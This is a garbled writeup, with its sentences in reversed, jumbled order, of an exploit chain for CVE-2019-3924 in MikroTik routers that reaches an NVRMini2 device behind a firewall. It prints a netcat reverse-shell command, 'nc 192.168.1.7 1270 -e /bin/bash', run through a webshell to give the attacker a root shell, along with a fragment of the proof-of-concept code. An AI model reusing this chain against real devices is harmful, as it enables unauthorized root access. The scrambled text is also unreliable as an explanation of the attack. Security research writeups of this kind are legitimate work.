I’ve combined the three sections above into a single exploit. The nc command will connect back to the attacker’s box with a root shell. The probe above executes the command “ nc 192.168.1.7 1270 -e /bin/bash” via the webshell at a.php. bool find_nvrmini2(Winbox_Session& session, std::string& p_address, boost::uint32_t p_converted_address, boost::uint32_t p_converted_port) I’ve again used my WinboxMessage implementation. The following is taken from my proof on concept on GitHub.
Using the title tag, you can construct a probe that detects an NVRMini2. Responses are matched against a provided regular expression. The probe supports up to three requests and responses. A probe is a set of variables that tells the router how to talk to a host on a given port. However, one of the binaries that handles the probes (agent) fails to verify whether the remote user is authenticated. Under normal circumstances, The Dude authenticates with the router and uploads the probes over the Winbox port. Probing to Bypass the FirewallĬVE-2019–3924 is the result of the router not enforcing authentication on network discovery probes. Let’s see how the attacker can get at 10.0.0.252 anyways.
The attacker, 192.168.1.7, shouldn’t be able to initiate communication with the victim at 10.0.0.252. Don’t worry, I’m just simulating real world configurations. By default, Winbox is only available on the MikroTik hAP via the LAN. One important thing about this setup is that I opened port 8291 in the router’s firewall to allow Winbox access from the WAN. NVRMini2 should be safe from the attacker at 192.168.1.7
0 kommentar(er)
